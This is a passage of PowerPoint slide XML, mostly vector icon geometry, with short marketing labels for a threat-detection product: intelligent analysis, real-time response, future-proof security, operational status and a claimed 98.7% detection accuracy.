            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1658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through continuous monitoring and pattern recognition.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68391" y="4580985"/>
            <a:ext cx="2464714" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2464714" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2464714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464714" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333842">
              <a:alpha val="8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1" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368391" y="4580985"/>
            <a:ext cx="35085" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35085" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35085" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009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Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596443" y="4791495"/>
            <a:ext cx="561358" cy="561358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="561358" h="561358">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="526273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="545650" y="0"/>
                  <a:pt x="561358" y="15708"/>
                  <a:pt x="561358" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="561358" y="526273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="561358" y="545650"/>
                  <a:pt x="545650" y="561358"/>
                  <a:pt x="526273" y="561358"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="561358"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="561358"/>
                  <a:pt x="0" y="545650"/>
                  <a:pt x="0" y="526273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Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747747" y="4940606"/>
            <a:ext cx="263137" cy="263137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="263137" h="263137">
                <a:moveTo>
                  <a:pt x="61673" y="28781"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="61673" y="12900"/>
                  <a:pt x="74573" y="0"/>
                  <a:pt x="90453" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="102788" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="111884" y="0"/>
                  <a:pt x="119234" y="7349"/>
                  <a:pt x="119234" y="16446"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="119234" y="246691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119234" y="255787"/>
                  <a:pt x="111884" y="263137"/>
                  <a:pt x="102788" y="263137"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86342" y="263137"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="71026" y="263137"/>
                  <a:pt x="58126" y="252652"/>
                  <a:pt x="54478" y="238468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54118" y="238468"/>
                  <a:pt x="53809" y="238468"/>
                  <a:pt x="53450" y="238468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30734" y="238468"/>
                  <a:pt x="12335" y="220069"/>
                  <a:pt x="12335" y="197353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12335" y="188102"/>
                  <a:pt x="15418" y="179570"/>
                  <a:pt x="20558" y="172683"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10587" y="165180"/>
                  <a:pt x="4112" y="153257"/>
                  <a:pt x="4112" y="139791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4112" y="123911"/>
                  <a:pt x="13157" y="110086"/>
                  <a:pt x="26314" y="103250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22665" y="97083"/>
                  <a:pt x="20558" y="89888"/>
                  <a:pt x="20558" y="82230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20558" y="59514"/>
                  <a:pt x="38957" y="41115"/>
                  <a:pt x="61673" y="41115"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="61673" y="28781"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="201464" y="28781"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="201464" y="41115"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="224180" y="41115"/>
                  <a:pt x="242579" y="59514"/>
                  <a:pt x="242579" y="82230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="242579" y="89939"/>
                  <a:pt x="240472" y="97134"/>
                  <a:pt x="236823" y="103250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="250031" y="110086"/>
                  <a:pt x="259025" y="123859"/>
                  <a:pt x="259025" y="139791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="259025" y="153257"/>
                  <a:pt x="252550" y="165180"/>
                  <a:pt x="242579" y="172683"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="247719" y="179570"/>
                  <a:pt x="250802" y="188102"/>
                  <a:pt x="250802" y="197353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="250802" y="220069"/>
                  <a:pt x="232403" y="238468"/>
                  <a:pt x="209687" y="238468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209327" y="238468"/>
                  <a:pt x="209019" y="238468"/>
                  <a:pt x="208659" y="238468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205010" y="252652"/>
                  <a:pt x="192110" y="263137"/>
                  <a:pt x="176795" y="263137"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="160349" y="263137"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="151252" y="263137"/>
                  <a:pt x="143903" y="255787"/>
                  <a:pt x="143903" y="246691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="143903" y="16446"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="143903" y="7349"/>
                  <a:pt x="151252" y="0"/>
                  <a:pt x="160349" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="172683" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="188564" y="0"/>
                  <a:pt x="201464" y="12900"/>
                  <a:pt x="201464" y="28781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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596443" y="5493193"/>
            <a:ext cx="2113865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Intelligent Analysis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596443" y="5808957"/>
            <a:ext cx="2096322" cy="631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Pattern recognition algorithms identify malicious behaviors without prior signatures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3058197" y="4580985"/>
            <a:ext cx="2464714" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2464714" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2464714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464714" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333842">
              <a:alpha val="8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7" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058197" y="4580985"/>
            <a:ext cx="35085" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35085" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35085" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009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Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286248" y="4791495"/>
            <a:ext cx="561358" cy="561358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="561358" h="561358">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="526273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="545650" y="0"/>
                  <a:pt x="561358" y="15708"/>
                  <a:pt x="561358" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="561358" y="526273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="561358" y="545650"/>
                  <a:pt x="545650" y="561358"/>
                  <a:pt x="526273" y="561358"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="561358"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="561358"/>
                  <a:pt x="0" y="545650"/>
                  <a:pt x="0" y="526273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Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453998" y="4940606"/>
            <a:ext cx="230245" cy="263137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="230245" h="263137">
                <a:moveTo>
                  <a:pt x="174122" y="-5088"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="180238" y="-668"/>
                  <a:pt x="182500" y="7349"/>
                  <a:pt x="179724" y="14339"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139432" y="115122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213799" y="115122"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220737" y="115122"/>
                  <a:pt x="226904" y="119439"/>
                  <a:pt x="229268" y="125966"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231632" y="132493"/>
                  <a:pt x="229628" y="139791"/>
                  <a:pt x="224334" y="144211"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76320" y="267557"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70512" y="272388"/>
                  <a:pt x="62238" y="272645"/>
                  <a:pt x="56122" y="268225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50006" y="263805"/>
                  <a:pt x="47745" y="255787"/>
                  <a:pt x="50520" y="248798"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="90813" y="148014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16446" y="148014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9508" y="148014"/>
                  <a:pt x="3341" y="143697"/>
                  <a:pt x="976" y="137170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1388" y="130643"/>
                  <a:pt x="617" y="123345"/>
                  <a:pt x="5910" y="118925"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="153925" y="-4420"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="159732" y="-9251"/>
                  <a:pt x="168007" y="-9508"/>
                  <a:pt x="174122" y="-5088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Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286248" y="5493193"/>
            <a:ext cx="2113865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Real-Time Response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3286248" y="5808957"/>
            <a:ext cx="2096322" cy="631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Instant threat classification enables immediate containment and response actions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5748002" y="4580985"/>
            <a:ext cx="2464714" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2464714" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2464714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2464714" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333842">
              <a:alpha val="8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Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5748002" y="4580985"/>
            <a:ext cx="35085" cy="2070009"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35085" h="2070009">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35085" y="2070009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2070009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Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976054" y="4791495"/>
            <a:ext cx="561358" cy="561358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="561358" h="561358">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="526273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="545650" y="0"/>
                  <a:pt x="561358" y="15708"/>
                  <a:pt x="561358" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="561358" y="526273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="561358" y="545650"/>
                  <a:pt x="545650" y="561358"/>
                  <a:pt x="526273" y="561358"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="561358"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="561358"/>
                  <a:pt x="0" y="545650"/>
                  <a:pt x="0" y="526273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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127357" y="4940606"/>
            <a:ext cx="263137" cy="263137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="263137" h="263137">
                <a:moveTo>
                  <a:pt x="131568" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="133932" y="0"/>
                  <a:pt x="136297" y="514"/>
                  <a:pt x="138455" y="1490"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="235281" y="42554"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="246588" y="47334"/>
                  <a:pt x="255016" y="58486"/>
                  <a:pt x="254965" y="71951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254708" y="122934"/>
                  <a:pt x="233739" y="216214"/>
                  <a:pt x="145188" y="258614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136605" y="262726"/>
                  <a:pt x="126635" y="262726"/>
                  <a:pt x="118052" y="258614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29449" y="216214"/>
                  <a:pt x="8531" y="122934"/>
                  <a:pt x="8274" y="71951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8223" y="58486"/>
                  <a:pt x="16652" y="47334"/>
                  <a:pt x="27958" y="42554"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124733" y="1490"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="126892" y="514"/>
                  <a:pt x="129204" y="0"/>
                  <a:pt x="131568" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="131568" y="34331"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131568" y="228651"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="202492" y="194320"/>
                  <a:pt x="221559" y="118257"/>
                  <a:pt x="222022" y="72722"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131568" y="34383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131568" y="34383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6" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976054" y="5493193"/>
            <a:ext cx="2113865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Future-Proof Security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5976054" y="5808957"/>
            <a:ext cx="2096322" cy="63152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Adaptive methodology detects evolving threats and advanced attack techniques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350849" y="6654502"/>
            <a:ext cx="11490302" cy="7017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11490302" h="7017">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11490302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11490302" y="7017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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9" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350849" y="6868519"/>
            <a:ext cx="561358" cy="561358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="561358" h="561358">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="526273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="545650" y="0"/>
                  <a:pt x="561358" y="15708"/>
                  <a:pt x="561358" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="561358" y="526273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="561358" y="545650"/>
                  <a:pt x="545650" y="561358"/>
                  <a:pt x="526273" y="561358"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="561358"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="561358"/>
                  <a:pt x="0" y="545650"/>
                  <a:pt x="0" y="526273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0" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502153" y="7017629"/>
            <a:ext cx="263137" cy="263137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="263137" h="263137">
                <a:moveTo>
                  <a:pt x="131568" y="263137"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204183" y="263137"/>
                  <a:pt x="263137" y="204183"/>
                  <a:pt x="263137" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="263137" y="58954"/>
                  <a:pt x="204183" y="0"/>
                  <a:pt x="131568" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58954" y="0"/>
                  <a:pt x="0" y="58954"/>
                  <a:pt x="0" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="204183"/>
                  <a:pt x="58954" y="263137"/>
                  <a:pt x="131568" y="263137"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="174945" y="109315"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="133830" y="175099"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131671" y="178542"/>
                  <a:pt x="127971" y="180701"/>
                  <a:pt x="123911" y="180906"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119851" y="181112"/>
                  <a:pt x="115945" y="179262"/>
                  <a:pt x="113529" y="175973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="88860" y="143081"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="84749" y="137633"/>
                  <a:pt x="85879" y="129924"/>
                  <a:pt x="91327" y="125812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96775" y="121701"/>
                  <a:pt x="104484" y="122831"/>
                  <a:pt x="108595" y="128279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="122472" y="146781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154027" y="96261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157625" y="90505"/>
                  <a:pt x="165231" y="88706"/>
                  <a:pt x="171039" y="92355"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176846" y="96004"/>
                  <a:pt x="178594" y="103559"/>
                  <a:pt x="174945" y="109366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Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052547" y="6903604"/>
            <a:ext cx="1359540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05" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6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STATUS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1052547" y="7149198"/>
            <a:ext cx="1377082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1" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3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Fully Operational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9218117" y="6903604"/>
            <a:ext cx="1920898" cy="2105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105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E6">
                    <a:alpha val="60000"/>
                  </a:srgbClr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DETECTION ACCURACY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9200575" y="7149198"/>
            <a:ext cx="1938440" cy="2455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sz="1381" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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98.7% True Positive Rate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11281657" y="6868519"/>
            <a:ext cx="561358" cy="561358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="561358" h="561358">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="526273" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="545650" y="0"/>
                  <a:pt x="561358" y="15708"/>
                  <a:pt x="561358" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="561358" y="526273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="561358" y="545650"/>
                  <a:pt x="545650" y="561358"/>
                  <a:pt x="526273" y="561358"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="561358"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="561358"/>
                  <a:pt x="0" y="545650"/>
                  <a:pt x="0" y="526273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35085"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15721"/>
                  <a:pt x="15721" y="0"/>
                  <a:pt x="35085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Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11416514" y="7017629"/>
            <a:ext cx="296029" cy="263137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="296029" h="263137">
                <a:moveTo>
                  <a:pt x="148014" y="-8223"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="157111" y="-8223"/>
                  <a:pt x="164460" y="-874"/>
                  <a:pt x="164460" y="8223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164460" y="17628"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="214878" y="24823"/>
                  <a:pt x="254759" y="64705"/>
                  <a:pt x="261955" y="115122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="271360" y="115122"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="280456" y="115122"/>
                  <a:pt x="287806" y="122472"/>
                  <a:pt x="287806" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="287806" y="140665"/>
                  <a:pt x="280456" y="148014"/>
                  <a:pt x="271360" y="148014"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261955" y="148014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="254759" y="198432"/>
                  <a:pt x="214878" y="238313"/>
                  <a:pt x="164460" y="245509"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164460" y="254914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164460" y="264010"/>
                  <a:pt x="157111" y="271360"/>
                  <a:pt x="148014" y="271360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138918" y="271360"/>
                  <a:pt x="131568" y="264010"/>
                  <a:pt x="131568" y="254914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131568" y="245509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="81151" y="238313"/>
                  <a:pt x="41269" y="198432"/>
                  <a:pt x="34074" y="148014"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24669" y="148014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15572" y="148014"/>
                  <a:pt x="8223" y="140665"/>
                  <a:pt x="8223" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8223" y="122472"/>
                  <a:pt x="15572" y="115122"/>
                  <a:pt x="24669" y="115122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34074" y="115122"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="41269" y="64705"/>
                  <a:pt x="81151" y="24823"/>
                  <a:pt x="131568" y="17628"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131568" y="8223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131568" y="-874"/>
                  <a:pt x="138918" y="-8223"/>
                  <a:pt x="148014" y="-8223"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="67429" y="148014"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="73956" y="180238"/>
                  <a:pt x="99344" y="205627"/>
                  <a:pt x="131568" y="212154"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131568" y="205576"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131568" y="196479"/>
                  <a:pt x="138918" y="189129"/>
                  <a:pt x="148014" y="189129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157111" y="189129"/>
                  <a:pt x="164460" y="196479"/>
                  <a:pt x="164460" y="205576"/>
